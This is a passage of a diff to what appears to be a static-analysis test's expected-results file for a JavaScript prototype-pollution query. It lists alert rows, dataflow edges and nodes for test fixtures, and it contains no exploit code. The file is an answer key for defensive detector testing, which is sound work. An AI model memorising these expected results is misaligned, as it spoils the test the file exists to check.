| tests.js:150:21:150:23 | src | src | tests.js:154:13:154:15 | dst | dst | +| tests.js:196:13:196:15 | dst | tests.js:192:19:192:25 | keys[i] | tests.js:196:13:196:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:190:28:190:30 | src | src | tests.js:196:13:196:15 | dst | dst | +| tests.js:233:5:233:13 | map[key1] | tests.js:238:14:238:16 | key | tests.js:233:5:233:13 | map[key1] | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:238:21:238:24 | data | data | tests.js:233:5:233:13 | map[key1] | here | +| tests.js:270:13:270:15 | dst | tests.js:265:19:265:26 | entry[0] | tests.js:270:13:270:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:264:20:264:22 | src | src | tests.js:270:13:270:15 | dst | dst | +| tests.js:280:13:280:15 | dst | tests.js:276:34:276:36 | key | tests.js:280:13:280:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:276:21:276:23 | src | src | tests.js:280:13:280:15 | dst | dst | +| tests.js:308:17:308:19 | dst | tests.js:302:14:302:16 | key | tests.js:308:17:308:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:302:21:302:23 | src | src | tests.js:308:17:308:19 | dst | dst | +| tests.js:322:17:322:19 | dst | tests.js:315:14:315:16 | key | tests.js:322:17:322:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:315:21:315:23 | src | src | tests.js:322:17:322:19 | dst | dst | +| tests.js:338:17:338:19 | dst | tests.js:329:14:329:16 | key | tests.js:338:17:338:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. 
| tests.js:329:21:329:23 | src | src | tests.js:338:17:338:19 | dst | dst | +| tests.js:357:17:357:22 | target | tests.js:350:37:350:39 | key | tests.js:357:17:357:22 | target | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:350:21:350:26 | source | source | tests.js:357:17:357:22 | target | target | +| tests.js:403:13:403:15 | dst | tests.js:381:14:381:16 | key | tests.js:403:13:403:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:381:21:381:23 | obj | obj | tests.js:403:13:403:15 | dst | dst | +| tests.js:419:13:419:15 | dst | tests.js:413:14:413:16 | key | tests.js:419:13:419:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:413:21:413:23 | src | src | tests.js:419:13:419:15 | dst | dst | +| tests.js:436:13:436:15 | dst | tests.js:430:14:430:16 | key | tests.js:436:13:436:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:430:21:430:23 | src | src | tests.js:436:13:436:15 | dst | dst | +| tests.js:465:30:465:32 | dst | tests.js:460:25:460:27 | key | tests.js:465:30:465:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:460:12:460:14 | src | src | tests.js:465:30:465:32 | dst | dst | +| tests.js:466:30:466:32 | dst | tests.js:460:25:460:27 | key | tests.js:466:30:466:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:460:12:460:14 | src | src | tests.js:466:30:466:32 | dst | dst | +| tests.js:467:30:467:32 | dst | tests.js:460:25:460:27 | key | tests.js:467:30:467:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. 
| tests.js:460:12:460:14 | src | src | tests.js:467:30:467:32 | dst | dst | +| tests.js:477:13:477:15 | dst | tests.js:473:25:473:27 | key | tests.js:477:13:477:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:473:12:473:14 | src | src | tests.js:477:13:477:15 | dst | dst | +| tests.js:489:13:489:15 | dst | tests.js:484:14:484:16 | key | tests.js:489:13:489:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:484:21:484:23 | src | src | tests.js:489:13:489:15 | dst | dst | +| tests.js:517:35:517:37 | dst | tests.js:511:19:511:25 | keys[i] | tests.js:517:35:517:37 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:509:28:509:30 | src | src | tests.js:517:35:517:37 | dst | dst | +| tests.js:529:13:529:15 | dst | tests.js:525:14:525:16 | key | tests.js:529:13:529:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:525:21:525:23 | src | src | tests.js:529:13:529:15 | dst | dst | +| tests.js:547:13:547:15 | dst | tests.js:538:18:538:24 | keys[i] | tests.js:547:13:547:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:535:30:535:32 | obj | obj | tests.js:547:13:547:15 | dst | dst | +| tests.js:605:13:605:16 | dest | tests.js:601:16:601:18 | key | tests.js:605:13:605:16 | dest | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:601:35:601:40 | source | source | tests.js:605:13:605:16 | dest | dest | edges | examples/PrototypePollutingFunction.js:1:16:1:18 | dst | examples/PrototypePollutingFunction.js:5:19:5:21 | dst | provenance | | | examples/PrototypePollutingFunction.js:1:16:1:18 | dst | examples/PrototypePollutingFunction.js:7:13:7:15 | dst | provenance | | 
@@ -1368,6 +748,659 @@ edges | tests.js:605:40:605:50 | source[key] | tests.js:591:25:591:27 | obj | provenance | | | tests.js:605:40:605:50 | source[key] | tests.js:605:25:605:51 | capture ... e[key]) | provenance | | | tests.js:605:47:605:49 | key | tests.js:605:40:605:50 | source[key] | provenance | Config | +nodes +| examples/PrototypePollutingFunction.js:1:16:1:18 | dst | semmle.label | dst | +| examples/PrototypePollutingFunction.js:1:21:1:23 | src | semmle.label | src | +| examples/PrototypePollutingFunction.js:2:14:2:16 | key | semmle.label | key | +| examples/PrototypePollutingFunction.js:5:19:5:21 | dst | semmle.label | dst | +| examples/PrototypePollutingFunction.js:5:19:5:26 | dst[key] | semmle.label | dst[key] | +| examples/PrototypePollutingFunction.js:5:23:5:25 | key | semmle.label | key | +| examples/PrototypePollutingFunction.js:5:29:5:31 | src | semmle.label | src | +| examples/PrototypePollutingFunction.js:5:29:5:36 | src[key] | semmle.label | src[key] | +| examples/PrototypePollutingFunction.js:5:33:5:35 | key | semmle.label | key | +| examples/PrototypePollutingFunction.js:7:13:7:15 | dst | semmle.label | dst | +| examples/PrototypePollutingFunction.js:7:17:7:19 | key | semmle.label | key | +| examples/PrototypePollutingFunction.js:7:24:7:26 | src | semmle.label | src | +| examples/PrototypePollutingFunction.js:7:24:7:31 | src[key] | semmle.label | src[key] | +| examples/PrototypePollutingFunction.js:7:28:7:30 | key | semmle.label | key | +| examples/PrototypePollutingFunction_fixed2.js:1:21:1:23 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed2.js:6:29:6:31 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed2.js:6:29:6:36 | src[key] | semmle.label | src[key] | +| examples/PrototypePollutingFunction_fixed2.js:8:24:8:26 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed2.js:8:24:8:31 | src[key] | semmle.label | src[key] | +| 
examples/PrototypePollutingFunction_fixed.js:1:21:1:23 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed.js:2:14:2:16 | key | semmle.label | key | +| examples/PrototypePollutingFunction_fixed.js:5:29:5:31 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed.js:5:29:5:36 | src[key] | semmle.label | src[key] | +| examples/PrototypePollutingFunction_fixed.js:7:17:7:19 | key | semmle.label | key | +| examples/PrototypePollutingFunction_fixed.js:7:24:7:26 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed.js:7:24:7:31 | src[key] | semmle.label | src[key] | +| examples/PrototypePollutingFunction_fixed.js:7:28:7:30 | key | semmle.label | key | +| path-assignment.js:8:13:8:25 | key | semmle.label | key | +| path-assignment.js:8:19:8:25 | keys[i] | semmle.label | keys[i] | +| path-assignment.js:13:13:13:32 | target | semmle.label | target | +| path-assignment.js:13:22:13:27 | target | semmle.label | target | +| path-assignment.js:13:22:13:32 | target[key] | semmle.label | target[key] | +| path-assignment.js:13:29:13:31 | key | semmle.label | key | +| path-assignment.js:15:13:15:18 | target | semmle.label | target | +| path-assignment.js:15:20:15:22 | key | semmle.label | key | +| path-assignment.js:41:13:41:25 | key | semmle.label | key | +| path-assignment.js:41:19:41:25 | keys[i] | semmle.label | keys[i] | +| path-assignment.js:42:9:42:48 | target | semmle.label | target | +| path-assignment.js:42:18:42:23 | target | semmle.label | target | +| path-assignment.js:42:25:42:27 | key | semmle.label | key | +| path-assignment.js:42:32:42:37 | target | semmle.label | target | +| path-assignment.js:42:32:42:42 | target[key] | semmle.label | target[key] | +| path-assignment.js:42:32:42:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | +| path-assignment.js:42:39:42:41 | key | semmle.label | key | +| path-assignment.js:44:5:44:10 | target | semmle.label | target | +| path-assignment.js:44:12:44:18 | 
keys[i] | semmle.label | keys[i] | +| path-assignment.js:58:13:58:25 | key | semmle.label | key | +| path-assignment.js:58:19:58:25 | keys[i] | semmle.label | keys[i] | +| path-assignment.js:59:9:59:48 | target | semmle.label | target | +| path-assignment.js:59:18:59:23 | target | semmle.label | target | +| path-assignment.js:59:25:59:27 | key | semmle.label | key | +| path-assignment.js:59:32:59:37 | target | semmle.label | target | +| path-assignment.js:59:32:59:42 | target[key] | semmle.label | target[key] | +| path-assignment.js:59:32:59:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | +| path-assignment.js:59:39:59:41 | key | semmle.label | key | +| path-assignment.js:61:5:61:10 | target | semmle.label | target | +| path-assignment.js:61:12:61:18 | keys[i] | semmle.label | keys[i] | +| path-assignment.js:68:13:68:25 | key | semmle.label | key | +| path-assignment.js:68:19:68:25 | keys[i] | semmle.label | keys[i] | +| path-assignment.js:69:9:69:48 | target | semmle.label | target | +| path-assignment.js:69:18:69:23 | target | semmle.label | target | +| path-assignment.js:69:25:69:27 | key | semmle.label | key | +| path-assignment.js:69:32:69:37 | target | semmle.label | target | +| path-assignment.js:69:32:69:42 | target[key] | semmle.label | target[key] | +| path-assignment.js:69:32:69:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | +| path-assignment.js:69:39:69:41 | key | semmle.label | key | +| path-assignment.js:71:5:71:10 | target | semmle.label | target | +| path-assignment.js:71:12:71:18 | keys[i] | semmle.label | keys[i] | +| tests.js:3:25:3:27 | dst | semmle.label | dst | +| tests.js:3:30:3:32 | src | semmle.label | src | +| tests.js:4:14:4:16 | key | semmle.label | key | +| tests.js:6:28:6:30 | dst | semmle.label | dst | +| tests.js:6:28:6:35 | dst[key] | semmle.label | dst[key] | +| tests.js:6:32:6:34 | key | semmle.label | key | +| tests.js:6:38:6:40 | src | semmle.label | src | +| tests.js:6:38:6:45 | src[key] | 
semmle.label | src[key] | +| tests.js:6:42:6:44 | key | semmle.label | key | +| tests.js:8:13:8:15 | dst | semmle.label | dst | +| tests.js:8:17:8:19 | key | semmle.label | key | +| tests.js:8:24:8:26 | src | semmle.label | src | +| tests.js:8:24:8:31 | src[key] | semmle.label | src[key] | +| tests.js:8:28:8:30 | key | semmle.label | key | +| tests.js:13:24:13:26 | dst | semmle.label | dst | +| tests.js:13:29:13:31 | src | semmle.label | src | +| tests.js:14:17:14:19 | src | semmle.label | src | +| tests.js:14:30:14:32 | key | semmle.label | key | +| tests.js:16:27:16:29 | dst | semmle.label | dst | +| tests.js:16:27:16:34 | dst[key] | semmle.label | dst[key] | +| tests.js:16:31:16:33 | key | semmle.label | key | +| tests.js:16:37:16:39 | src | semmle.label | src | +| tests.js:16:37:16:44 | src[key] | semmle.label | src[key] | +| tests.js:16:41:16:43 | key | semmle.label | key | +| tests.js:18:13:18:15 | dst | semmle.label | dst | +| tests.js:18:17:18:19 | key | semmle.label | key | +| tests.js:18:24:18:26 | src | semmle.label | src | +| tests.js:18:24:18:31 | src[key] | semmle.label | src[key] | +| tests.js:18:28:18:30 | key | semmle.label | key | +| tests.js:23:19:23:21 | dst | semmle.label | dst | +| tests.js:23:27:23:33 | sources [0] | semmle.label | sources [0] | +| tests.js:24:14:24:19 | source | semmle.label | source | +| tests.js:24:24:24:30 | sources [0] | semmle.label | sources [0] | +| tests.js:25:18:25:20 | key | semmle.label | key | +| tests.js:26:25:26:27 | dst | semmle.label | dst | +| tests.js:26:30:26:35 | source | semmle.label | source | +| tests.js:26:30:26:40 | source[key] | semmle.label | source[key] | +| tests.js:26:37:26:39 | key | semmle.label | key | +| tests.js:26:43:26:45 | key | semmle.label | key | +| tests.js:31:22:31:24 | dst | semmle.label | dst | +| tests.js:31:27:31:31 | value | semmle.label | value | +| tests.js:31:34:31:36 | key | semmle.label | key | +| tests.js:32:9:32:27 | dstValue | semmle.label | dstValue | +| 
tests.js:32:20:32:22 | dst | semmle.label | dst | +| tests.js:32:20:32:27 | dst[key] | semmle.label | dst[key] | +| tests.js:32:24:32:26 | key | semmle.label | key | +| tests.js:34:18:34:25 | dstValue | semmle.label | dstValue | +| tests.js:34:28:34:32 | value | semmle.label | value | +| tests.js:36:9:36:11 | dst | semmle.label | dst | +| tests.js:36:13:36:15 | key | semmle.label | key | +| tests.js:36:20:36:24 | value | semmle.label | value | +| tests.js:40:27:40:29 | dst | semmle.label | dst | +| tests.js:40:32:40:34 | src | semmle.label | src | +| tests.js:41:14:41:16 | key | semmle.label | key | +| tests.js:44:30:44:32 | dst | semmle.label | dst | +| tests.js:44:30:44:37 | dst[key] | semmle.label | dst[key] | +| tests.js:44:34:44:36 | key | semmle.label | key | +| tests.js:44:40:44:42 | src | semmle.label | src | +| tests.js:44:40:44:47 | src[key] | semmle.label | src[key] | +| tests.js:44:44:44:46 | key | semmle.label | key | +| tests.js:46:13:46:15 | dst | semmle.label | dst | +| tests.js:46:17:46:19 | key | semmle.label | key | +| tests.js:46:24:46:26 | src | semmle.label | src | +| tests.js:46:24:46:31 | src[key] | semmle.label | src[key] | +| tests.js:46:28:46:30 | key | semmle.label | key | +| tests.js:51:26:51:28 | dst | semmle.label | dst | +| tests.js:51:31:51:33 | src | semmle.label | src | +| tests.js:52:14:52:16 | key | semmle.label | key | +| tests.js:55:29:55:31 | dst | semmle.label | dst | +| tests.js:55:29:55:36 | dst[key] | semmle.label | dst[key] | +| tests.js:55:33:55:35 | key | semmle.label | key | +| tests.js:55:39:55:41 | src | semmle.label | src | +| tests.js:55:39:55:46 | src[key] | semmle.label | src[key] | +| tests.js:55:43:55:45 | key | semmle.label | key | +| tests.js:57:13:57:15 | dst | semmle.label | dst | +| tests.js:57:17:57:19 | key | semmle.label | key | +| tests.js:57:24:57:26 | src | semmle.label | src | +| tests.js:57:24:57:31 | src[key] | semmle.label | src[key] | +| tests.js:57:28:57:30 | key | semmle.label | key | +| 
tests.js:62:33:62:35 | src | semmle.label | src | +| tests.js:66:41:66:43 | src | semmle.label | src | +| tests.js:66:41:66:48 | src[key] | semmle.label | src[key] | +| tests.js:68:24:68:26 | src | semmle.label | src | +| tests.js:68:24:68:31 | src[key] | semmle.label | src[key] | +| tests.js:77:27:77:29 | src | semmle.label | src | +| tests.js:81:39:81:41 | src | semmle.label | src | +| tests.js:81:39:81:46 | src[key] | semmle.label | src[key] | +| tests.js:83:28:83:30 | src | semmle.label | src | +| tests.js:83:28:83:35 | src[key] | semmle.label | src[key] | +| tests.js:89:34:89:36 | src | semmle.label | src | +| tests.js:90:14:90:16 | key | semmle.label | key | +| tests.js:94:42:94:44 | src | semmle.label | src | +| tests.js:94:42:94:49 | src[key] | semmle.label | src[key] | +| tests.js:96:17:96:19 | key | semmle.label | key | +| tests.js:96:24:96:26 | src | semmle.label | src | +| tests.js:96:24:96:31 | src[key] | semmle.label | src[key] | +| tests.js:96:28:96:30 | key | semmle.label | key | +| tests.js:101:32:101:34 | dst | semmle.label | dst | +| tests.js:101:37:101:39 | src | semmle.label | src | +| tests.js:102:14:102:16 | key | semmle.label | key | +| tests.js:107:35:107:37 | dst | semmle.label | dst | +| tests.js:107:35:107:42 | dst[key] | semmle.label | dst[key] | +| tests.js:107:39:107:41 | key | semmle.label | key | +| tests.js:107:45:107:47 | src | semmle.label | src | +| tests.js:107:45:107:52 | src[key] | semmle.label | src[key] | +| tests.js:107:49:107:51 | key | semmle.label | key | +| tests.js:109:13:109:15 | dst | semmle.label | dst | +| tests.js:109:17:109:19 | key | semmle.label | key | +| tests.js:109:24:109:26 | src | semmle.label | src | +| tests.js:109:24:109:31 | src[key] | semmle.label | src[key] | +| tests.js:109:28:109:30 | key | semmle.label | key | +| tests.js:116:41:116:43 | src | semmle.label | src | +| tests.js:117:14:117:16 | key | semmle.label | key | +| tests.js:119:49:119:51 | src | semmle.label | src | +| 
tests.js:119:49:119:56 | src[key] | semmle.label | src[key] | +| tests.js:121:17:121:19 | key | semmle.label | key | +| tests.js:121:24:121:26 | src | semmle.label | src | +| tests.js:121:24:121:31 | src[key] | semmle.label | src[key] | +| tests.js:121:28:121:30 | key | semmle.label | key | +| tests.js:149:31:149:33 | dst | semmle.label | dst | +| tests.js:149:36:149:38 | src | semmle.label | src | +| tests.js:150:14:150:16 | key | semmle.label | key | +| tests.js:152:22:152:24 | dst | semmle.label | dst | +| tests.js:152:27:152:29 | src | semmle.label | src | +| tests.js:152:32:152:34 | key | semmle.label | key | +| tests.js:154:13:154:15 | dst | semmle.label | dst | +| tests.js:154:17:154:19 | key | semmle.label | key | +| tests.js:154:24:154:26 | src | semmle.label | src | +| tests.js:154:24:154:31 | src[key] | semmle.label | src[key] | +| tests.js:154:28:154:30 | key | semmle.label | key | +| tests.js:159:36:159:38 | dst | semmle.label | dst | +| tests.js:159:41:159:43 | src | semmle.label | src | +| tests.js:160:26:160:28 | dst | semmle.label | dst | +| tests.js:160:31:160:33 | src | semmle.label | src | +| tests.js:160:37:160:39 | dst | semmle.label | dst | +| tests.js:160:42:160:44 | src | semmle.label | src | +| tests.js:160:47:160:49 | key | semmle.label | key | +| tests.js:161:35:161:37 | dst | semmle.label | dst | +| tests.js:161:35:161:42 | dst[key] | semmle.label | dst[key] | +| tests.js:161:39:161:41 | key | semmle.label | key | +| tests.js:161:45:161:47 | src | semmle.label | src | +| tests.js:161:45:161:52 | src[key] | semmle.label | src[key] | +| tests.js:161:49:161:51 | key | semmle.label | key | +| tests.js:165:37:165:39 | src | semmle.label | src | +| tests.js:166:14:166:16 | key | semmle.label | key | +| tests.js:169:45:169:47 | src | semmle.label | src | +| tests.js:169:45:169:52 | src[key] | semmle.label | src[key] | +| tests.js:169:49:169:51 | key | semmle.label | key | +| tests.js:171:17:171:19 | key | semmle.label | key | +| 
tests.js:171:24:171:26 | src | semmle.label | src | +| tests.js:171:24:171:31 | src[key] | semmle.label | src[key] | +| tests.js:171:28:171:30 | key | semmle.label | key | +| tests.js:178:33:178:35 | src | semmle.label | src | +| tests.js:182:41:182:43 | src | semmle.label | src | +| tests.js:182:41:182:48 | src[key] | semmle.label | src[key] | +| tests.js:184:24:184:26 | src | semmle.label | src | +| tests.js:184:24:184:31 | src[key] | semmle.label | src[key] | +| tests.js:189:32:189:34 | dst | semmle.label | dst | +| tests.js:189:37:189:39 | src | semmle.label | src | +| tests.js:192:13:192:25 | key | semmle.label | key | +| tests.js:192:19:192:25 | keys[i] | semmle.label | keys[i] | +| tests.js:194:35:194:37 | dst | semmle.label | dst | +| tests.js:194:35:194:42 | dst[key] | semmle.label | dst[key] | +| tests.js:194:39:194:41 | key | semmle.label | key | +| tests.js:194:45:194:47 | src | semmle.label | src | +| tests.js:194:45:194:52 | src[key] | semmle.label | src[key] | +| tests.js:194:49:194:51 | key | semmle.label | key | +| tests.js:196:13:196:15 | dst | semmle.label | dst | +| tests.js:196:17:196:19 | key | semmle.label | key | +| tests.js:196:24:196:26 | src | semmle.label | src | +| tests.js:196:24:196:31 | src[key] | semmle.label | src[key] | +| tests.js:196:28:196:30 | key | semmle.label | key | +| tests.js:201:39:201:41 | dst | semmle.label | dst | +| tests.js:201:44:201:46 | src | semmle.label | src | +| tests.js:206:42:206:44 | dst | semmle.label | dst | +| tests.js:206:42:206:53 | dst[keys[i]] | semmle.label | dst[keys[i]] | +| tests.js:206:46:206:52 | keys[i] | semmle.label | keys[i] | +| tests.js:206:56:206:58 | src | semmle.label | src | +| tests.js:206:56:206:67 | src[keys[i]] | semmle.label | src[keys[i]] | +| tests.js:206:60:206:66 | keys[i] | semmle.label | keys[i] | +| tests.js:208:13:208:15 | dst | semmle.label | dst | +| tests.js:208:17:208:23 | keys[i] | semmle.label | keys[i] | +| tests.js:208:28:208:30 | src | semmle.label | src | +| 
tests.js:208:28:208:39 | src[keys[i]] | semmle.label | src[keys[i]] | +| tests.js:208:32:208:38 | keys[i] | semmle.label | keys[i] | +| tests.js:213:23:213:26 | key1 | semmle.label | key1 | +| tests.js:213:29:213:32 | key2 | semmle.label | key2 | +| tests.js:213:35:213:39 | value | semmle.label | value | +| tests.js:217:5:217:13 | map[key1] | semmle.label | map[key1] | +| tests.js:217:9:217:12 | key1 | semmle.label | key1 | +| tests.js:217:15:217:18 | key2 | semmle.label | key2 | +| tests.js:217:23:217:27 | value | semmle.label | value | +| tests.js:223:14:223:16 | key | semmle.label | key | +| tests.js:224:23:224:25 | key | semmle.label | key | +| tests.js:224:33:224:41 | data[key] | semmle.label | data[key] | +| tests.js:224:38:224:40 | key | semmle.label | key | +| tests.js:225:28:225:30 | key | semmle.label | key | +| tests.js:225:33:225:41 | data[key] | semmle.label | data[key] | +| tests.js:225:38:225:40 | key | semmle.label | key | +| tests.js:229:26:229:29 | key1 | semmle.label | key1 | +| tests.js:229:32:229:35 | key2 | semmle.label | key2 | +| tests.js:229:38:229:42 | value | semmle.label | value | +| tests.js:233:5:233:13 | map[key1] | semmle.label | map[key1] | +| tests.js:233:9:233:12 | key1 | semmle.label | key1 | +| tests.js:233:15:233:18 | key2 | semmle.label | key2 | +| tests.js:233:23:233:27 | value | semmle.label | value | +| tests.js:238:14:238:16 | key | semmle.label | key | +| tests.js:239:24:239:26 | key | semmle.label | key | +| tests.js:239:34:239:42 | data[key] | semmle.label | data[key] | +| tests.js:239:39:239:41 | key | semmle.label | key | +| tests.js:240:31:240:33 | key | semmle.label | key | +| tests.js:240:36:240:44 | data[key] | semmle.label | data[key] | +| tests.js:240:41:240:43 | key | semmle.label | key | +| tests.js:263:27:263:29 | dst | semmle.label | dst | +| tests.js:265:13:265:26 | key | semmle.label | key | +| tests.js:265:19:265:26 | entry[0] | semmle.label | entry[0] | +| tests.js:266:13:266:28 | value | semmle.label | 
value | +| tests.js:266:21:266:28 | entry[1] | semmle.label | entry[1] | +| tests.js:268:30:268:32 | dst | semmle.label | dst | +| tests.js:268:30:268:37 | dst[key] | semmle.label | dst[key] | +| tests.js:268:34:268:36 | key | semmle.label | key | +| tests.js:270:13:270:15 | dst | semmle.label | dst | +| tests.js:270:17:270:19 | key | semmle.label | key | +| tests.js:270:24:270:28 | value | semmle.label | value | +| tests.js:275:27:275:29 | dst | semmle.label | dst | +| tests.js:275:32:275:34 | src | semmle.label | src | +| tests.js:276:21:276:23 | src | semmle.label | src | +| tests.js:276:34:276:36 | key | semmle.label | key | +| tests.js:278:30:278:32 | dst | semmle.label | dst | +| tests.js:278:30:278:37 | dst[key] | semmle.label | dst[key] | +| tests.js:278:34:278:36 | key | semmle.label | key | +| tests.js:278:40:278:42 | src | semmle.label | src | +| tests.js:278:40:278:47 | src[key] | semmle.label | src[key] | +| tests.js:278:44:278:46 | key | semmle.label | key | +| tests.js:280:13:280:15 | dst | semmle.label | dst | +| tests.js:280:17:280:19 | key | semmle.label | key | +| tests.js:280:24:280:26 | src | semmle.label | src | +| tests.js:280:24:280:31 | src[key] | semmle.label | src[key] | +| tests.js:280:28:280:30 | key | semmle.label | key | +| tests.js:301:27:301:29 | dst | semmle.label | dst | +| tests.js:301:32:301:34 | src | semmle.label | src | +| tests.js:302:14:302:16 | key | semmle.label | key | +| tests.js:304:17:304:32 | value | semmle.label | value | +| tests.js:304:17:304:32 | value | semmle.label | value | +| tests.js:304:17:304:32 | value | semmle.label | value | +| tests.js:304:25:304:27 | src | semmle.label | src | +| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | +| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | +| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | +| tests.js:304:29:304:31 | key | semmle.label | key | +| tests.js:306:34:306:36 | dst | semmle.label | dst | +| tests.js:306:34:306:41 
| dst[key] | semmle.label | dst[key] | +| tests.js:306:38:306:40 | key | semmle.label | key | +| tests.js:306:44:306:48 | value | semmle.label | value | +| tests.js:308:17:308:19 | dst | semmle.label | dst | +| tests.js:308:21:308:23 | key | semmle.label | key | +| tests.js:308:28:308:32 | value | semmle.label | value | +| tests.js:314:31:314:33 | dst | semmle.label | dst | +| tests.js:314:36:314:38 | src | semmle.label | src | +| tests.js:315:14:315:16 | key | semmle.label | key | +| tests.js:318:17:318:32 | value | semmle.label | value | +| tests.js:318:17:318:32 | value | semmle.label | value | +| tests.js:318:17:318:32 | value | semmle.label | value | +| tests.js:318:25:318:27 | src | semmle.label | src | +| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | +| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | +| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | +| tests.js:318:29:318:31 | key | semmle.label | key | +| tests.js:320:38:320:40 | dst | semmle.label | dst | +| tests.js:320:38:320:45 | dst[key] | semmle.label | dst[key] | +| tests.js:320:42:320:44 | key | semmle.label | key | +| tests.js:320:48:320:52 | value | semmle.label | value | +| tests.js:322:17:322:19 | dst | semmle.label | dst | +| tests.js:322:21:322:23 | key | semmle.label | key | +| tests.js:322:28:322:32 | value | semmle.label | value | +| tests.js:328:25:328:27 | dst | semmle.label | dst | +| tests.js:328:30:328:32 | src | semmle.label | src | +| tests.js:329:14:329:16 | key | semmle.label | key | +| tests.js:336:32:336:34 | dst | semmle.label | dst | +| tests.js:336:32:336:39 | dst[key] | semmle.label | dst[key] | +| tests.js:336:36:336:38 | key | semmle.label | key | +| tests.js:336:42:336:44 | src | semmle.label | src | +| tests.js:336:42:336:49 | src[key] | semmle.label | src[key] | +| tests.js:336:46:336:48 | key | semmle.label | key | +| tests.js:338:17:338:19 | dst | semmle.label | dst | +| tests.js:338:21:338:23 | key | semmle.label | key | +| 
tests.js:338:28:338:30 | src | semmle.label | src | +| tests.js:338:28:338:35 | src[key] | semmle.label | src[key] | +| tests.js:338:32:338:34 | key | semmle.label | key | +| tests.js:348:32:348:37 | target | semmle.label | target | +| tests.js:348:40:348:45 | source | semmle.label | source | +| tests.js:349:26:349:31 | target | semmle.label | target | +| tests.js:349:54:349:59 | source | semmle.label | source | +| tests.js:350:21:350:26 | source | semmle.label | source | +| tests.js:350:37:350:39 | key | semmle.label | key | +| tests.js:355:17:355:22 | target | semmle.label | target | +| tests.js:355:24:355:26 | key | semmle.label | key | +| tests.js:355:31:355:86 | mergePl ... ptions) | semmle.label | mergePl ... ptions) | +| tests.js:355:53:355:58 | target | semmle.label | target | +| tests.js:355:53:355:63 | target[key] | semmle.label | target[key] | +| tests.js:355:60:355:62 | key | semmle.label | key | +| tests.js:355:66:355:71 | source | semmle.label | source | +| tests.js:355:66:355:76 | source[key] | semmle.label | source[key] | +| tests.js:357:17:357:22 | target | semmle.label | target | +| tests.js:357:24:357:26 | key | semmle.label | key | +| tests.js:357:31:357:36 | source | semmle.label | source | +| tests.js:357:31:357:41 | source[key] | semmle.label | source[key] | +| tests.js:357:38:357:40 | key | semmle.label | key | +| tests.js:361:12:361:17 | target | semmle.label | target | +| tests.js:364:41:364:46 | target | semmle.label | target | +| tests.js:364:49:364:54 | source | semmle.label | source | +| tests.js:366:18:366:20 | key | semmle.label | key | +| tests.js:371:24:371:26 | key | semmle.label | key | +| tests.js:371:31:371:95 | mergePl ... ptions) | semmle.label | mergePl ... 
ptions) | +| tests.js:371:62:371:72 | target[key] | semmle.label | target[key] | +| tests.js:371:69:371:71 | key | semmle.label | key | +| tests.js:371:75:371:80 | source | semmle.label | source | +| tests.js:371:75:371:85 | source[key] | semmle.label | source[key] | +| tests.js:373:24:373:26 | key | semmle.label | key | +| tests.js:373:31:373:36 | source | semmle.label | source | +| tests.js:373:31:373:41 | source[key] | semmle.label | source[key] | +| tests.js:373:38:373:40 | key | semmle.label | key | +| tests.js:377:12:377:17 | target | semmle.label | target | +| tests.js:380:22:380:24 | obj | semmle.label | obj | +| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | +| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | +| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | +| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | +| tests.js:380:27:380:34 | callback [src] | semmle.label | callback [src] | +| tests.js:381:14:381:16 | key | semmle.label | key | +| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | +| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | +| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | +| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | +| tests.js:383:13:383:20 | callback [src] | semmle.label | callback [src] | +| tests.js:383:22:383:24 | key | semmle.label | key | +| tests.js:383:27:383:29 | obj | semmle.label | obj | +| tests.js:383:27:383:34 | obj[key] | semmle.label | obj[key] | +| tests.js:383:31:383:33 | key | semmle.label | key | +| tests.js:388:29:388:31 | dst | semmle.label | dst | +| tests.js:388:29:388:31 | dst | semmle.label | dst | +| tests.js:388:34:388:36 | src | semmle.label | src | +| tests.js:389:17:389:19 | src | semmle.label | src | +| tests.js:389:22:389:24 | key | semmle.label | key | +| tests.js:391:32:391:34 | dst | 
